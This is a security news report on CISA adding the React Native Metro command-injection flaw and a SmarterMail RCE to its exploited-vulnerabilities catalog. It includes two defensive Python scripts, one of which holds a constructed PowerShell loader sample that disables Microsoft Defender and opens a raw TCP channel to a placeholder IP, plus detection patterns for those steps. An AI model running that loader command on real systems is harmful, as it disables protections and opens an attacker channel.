U.S. CISA adds SmarterTools SmarterMail and React Native Community CLI flaws to its Known Exploited Vulnerabilities catalog


Pierluigi Paganini February 06, 2026

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SmarterTools SmarterMail and React Native Community CLI flaws to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SmarterTools SmarterMail and React Native Community CLI flaws to its Known Exploited Vulnerabilities (KEV) catalog.

Below are the flaws added to the catalog:

  • CVE-2025-11953 React Native Community CLI OS Command Injection Vulnerability
  • CVE-2026-24423 SmarterTools SmarterMail Missing Authentication for Critical Function Vulnerability

Attackers are actively exploiting a critical flaw in the Metro development server that the React Native Community CLI starts, tracked as CVE-2025-11953. The server binds to external interfaces by default and exposes an endpoint vulnerable to OS command injection: an unauthenticated attacker who can reach the port sends a crafted POST request and gets arbitrary executables launched on the developer's machine, and on Windows can additionally run shell commands with fully controlled arguments.

“The Metro Development Server, which is opened by the React Native Community CLI, binds to external interfaces by default. The server exposes an endpoint that is vulnerable to OS command injection. This allows unauthenticated network attackers to send a POST request to the server and run arbitrary executables.” reads the advisory. “On Windows, the attackers can also execute arbitrary shell commands with fully controlled arguments.”

Metro is the JavaScript bundler and development server used by React Native; the Community CLI launches it during local development. Because the vulnerable endpoint is served on every interface the server listens on, any host that can reach the Metro port can trigger it without authentication. Arbitrary executables can be started on any platform; the Windows code path additionally allows arbitrary shell commands with attacker-controlled arguments. The flaw was publicly disclosed by JFrog in November 2025 and fixed in @react-native-community/cli 20.0.0, so the practical remediation is to upgrade the CLI and to keep development servers off interfaces reachable from untrusted networks.
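The quickest thing a defender can do with the description above is find out whether a Metro instance on a developer machine is bound to something other than loopback. The following is an added example, not code from the article, from JFrog, or from the React Native CLI project: it parses the output of `ss -ltnp` (Linux) for listeners on Metro's default port 8081 that are not bound to loopback, and it also checks the body that Metro's `/status` endpoint returns (`packager-status:running`) so the same logic can be used in a live probe. The `ss` lines, PIDs, and the `probe_metro` helper are constructed for the example.

```python
"""Added example (not from the article, JFrog, or the React Native CLI project):
flag Metro dev servers listening on non-loopback addresses. Metro's default port
(8081) and its /status reply ("packager-status:running") are real; the sample
`ss -ltnp` output and PIDs below are constructed."""
import http.client
import re

METRO_DEFAULT_PORT = 8081
LOOPBACK_PREFIXES = ("127.", "::1", "[::1]")
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')  # users:(("node",pid=4242,fd=22))


def split_hostport(addr: str):
    """'0.0.0.0:8081' -> ('0.0.0.0', 8081); '[::]:8081' -> ('[::]', 8081)."""
    host, _, port = addr.rpartition(":")
    return host, int(port)


def is_loopback(host: str) -> bool:
    return host.startswith(LOOPBACK_PREFIXES)


def find_exposed_listeners(ss_lines, ports=(METRO_DEFAULT_PORT,)):
    """Return (host, port, process, pid) for every LISTEN socket on one of `ports`
    whose local address is not loopback. Wildcard binds (0.0.0.0, [::], *) count
    as exposed, which is exactly the default Metro binding the advisory describes."""
    exposed = []
    for line in ss_lines:
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue  # header line or a non-listening socket
        host, port = split_hostport(fields[3])
        if port not in ports or is_loopback(host):
            continue
        m = PROC_RE.search(line)
        proc, pid = (m.group(1), int(m.group(2))) if m else ("?", -1)
        exposed.append((host, port, proc, pid))
    return exposed


def is_metro_status_body(body: str) -> bool:
    """True if an HTTP GET /status body is the Metro packager's liveness reply."""
    return body.strip() == "packager-status:running"


def probe_metro(host: str, port: int = METRO_DEFAULT_PORT, timeout: float = 3.0) -> bool:
    """Live check (not exercised offline): GET /status and see whether Metro answers.
    Use it only against hosts you are authorised to test."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", "/status")
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", "replace")
        return resp.status == 200 and is_metro_status_body(body)
    except OSError:
        return False
    finally:
        conn.close()


# Constructed `ss -ltnp` output: Metro on all IPv4 interfaces (exposed), a second
# instance on the IPv6 wildcard (exposed), a loopback-only instance, and sshd.
SAMPLE_SS = """\
State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port  Process
LISTEN  0       511            0.0.0.0:8081         0.0.0.0:*      users:(("node",pid=4242,fd=22))
LISTEN  0       511          127.0.0.1:8081         0.0.0.0:*      users:(("node",pid=4300,fd=19))
LISTEN  0       128               [::]:22              [::]:*      users:(("sshd",pid=901,fd=3))
LISTEN  0       511               [::]:8081            [::]:*      users:(("node",pid=5151,fd=22))
""".splitlines()

if __name__ == "__main__":
    for host, port, proc, pid in find_exposed_listeners(SAMPLE_SS):
        print(f"exposed dev server: {proc}[{pid}] listening on {host}:{port}")
```

On a real machine, feed the function `subprocess.run(["ss", "-ltnp"], capture_output=True, text=True).stdout.splitlines()`; Windows users can apply the same logic to `netstat -ano` output after adjusting the column positions. A loopback-only listener is not a finding, which is the state you want a development server in.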

VulnCheck researchers observed consistent, real-world exploitation for weeks before the activity received any broad public acknowledgment.

VulnCheck first spotted in-the-wild exploitation of CVE-2025-11953 (which it calls Metro4Shell) on December 21, 2025, and saw it again in January 2026, showing that attackers kept using it. Despite this, the activity has drawn little public attention and the flaw still carries a low EPSS score. That gap is risky: the flaw is easy to exploit, and internet-wide scan data shows many exposed Metro servers still reachable from the public internet.

“Now, more than a month after initial exploitation in the wild, that activity has yet to see broad public acknowledgment, and EPSS continues to assign a low exploitation probability of 0.00405.” reads the advisory published by VulnCheck. “This gap between observed exploitation and wider recognition matters, particularly for vulnerabilities that are easy to exploit and, as internet-wide search data shows, exposed on the public internet.”

VulnCheck found active, sustained exploitation of CVE-2025-11953, indicating operational use rather than testing. In the observed chain, the injected command ran cmd.exe, which launched a multi-stage, base64-encoded PowerShell loader; the loader disabled Microsoft Defender protections, fetched further payloads over a raw TCP connection, and executed a downloaded binary. That final payload was a UPX-packed Rust binary with basic anti-analysis features.
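The chain above gives a defender several observable steps, and the following is an added example of how to turn them into detection logic (this is not VulnCheck's code or the article's, and the parent-child chain node.exe -> cmd.exe -> powershell.exe is an assumption drawn from the description, not a published indicator). It runs over constructed Windows process-creation events using Sysmon Event ID 1 style field names, decodes `-EncodedCommand` payloads the way PowerShell does (base64 of UTF-16LE), and flags Defender tampering and raw TCP payload retrieval. The loader text and the 203.0.113.10 address are constructed.

```python
"""Added example (not from the article or VulnCheck): detection logic for the
post-exploitation chain described above, applied to constructed Windows
process-creation events (Sysmon Event ID 1 field names). The node.exe ->
cmd.exe -> powershell.exe chain is an assumption; the loader is constructed."""
import base64
import binascii
import re

DEV_SERVER_IMAGES = {"node.exe"}  # assumption: the Metro server runs under node.exe
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
ENCODED_FLAG = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.I)
# Behaviours the article names: disabling Defender, pulling payloads over raw TCP.
DEFENDER_TAMPER = re.compile(r"(Set|Add)-MpPreference\s+-(Disable\w+|Exclusion\w+)", re.I)
RAW_TCP_FETCH = re.compile(r"Net\.Sockets\.TcpClient", re.I)


def image_name(path: str) -> str:
    """Basename of a Windows or POSIX path, lower-cased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -enc/-EncodedCommand,
    else None. PowerShell expects base64 of UTF-16LE text, so decode it that way."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if ENCODED_FLAG.match(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                return None
    return None


def analyze_event(ev: dict) -> list:
    """Findings for one process-creation event, in a fixed order."""
    findings = []
    parent, child = image_name(ev.get("ParentImage", "")), image_name(ev.get("Image", ""))
    if parent in DEV_SERVER_IMAGES and child in SHELL_IMAGES:
        findings.append("dev-server spawned shell")
    cmdline = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded powershell")
    script = decoded if decoded is not None else cmdline  # also catch plaintext loaders
    if DEFENDER_TAMPER.search(script):
        findings.append("defender tampering")
    if RAW_TCP_FETCH.search(script):
        findings.append("raw tcp payload fetch")
    return findings


def scan(events) -> list:
    """(ProcessId, findings) for every event that triggers at least one rule."""
    return [(ev["ProcessId"], tuple(f)) for ev in events if (f := analyze_event(ev))]


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects; used only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed loader: disables Defender real-time monitoring, opens a raw TCP channel.
LOADER = ("Set-MpPreference -DisableRealtimeMonitoring $true; "
          "$c = New-Object Net.Sockets.TcpClient('203.0.113.10', 4444); "
          "$s = $c.GetStream()")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4242, "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -enc " + encode_ps(LOADER)},
    {"ProcessId": 4243, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell -nop -w hidden -enc " + encode_ps(LOADER)},
    {"ProcessId": 5000, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -NoProfile -Command Get-Date"},  # benign control
]

if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_EVENTS):
        print(pid, ", ".join(findings))
```

The first rule (a development server process spawning a shell) is the one worth alerting on by itself on developer workstations, since Metro has no legitimate reason to launch cmd.exe or PowerShell; the Defender-tampering and raw-TCP rules are generic and will also match unrelated intrusions, which is fine for a triage queue.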

VulnCheck noted that the attacks reused the same infrastructure and techniques for weeks, and warns that the lack of public acknowledgment risks leaving defenders unprepared, since exploitation often begins well before official recognition.

At the end of January 2026, SmarterTools fixed two security bugs in its SmarterMail email server, including a critical unauthenticated remote code execution vulnerability, tracked as CVE-2026-24423 (CVSS score 9.3), that lets attackers run arbitrary code on affected systems.

“SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method.” reads the advisory. “The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application.”

The researchers Sina Kheirkhah and Piotr Bazydlo of watchTowr, Markus Wulftange of CODE WHITE GmbH, and Cale Black of VulnCheck reported the vulnerability.

SmarterTools addressed the issue in SmarterMail Build 9511; any deployment running an earlier build should be updated.

According to Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, Federal Civilian Executive Branch (FCEB) agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix the vulnerabilities by February 26, 2026.





Source: https://securityaffairs.com/187675/security/u-s-cisa-adds-smartertools-smartermail-and-react-native-community-cli-flaws-to-its-known-exploited-vulnerabilities-catalog.html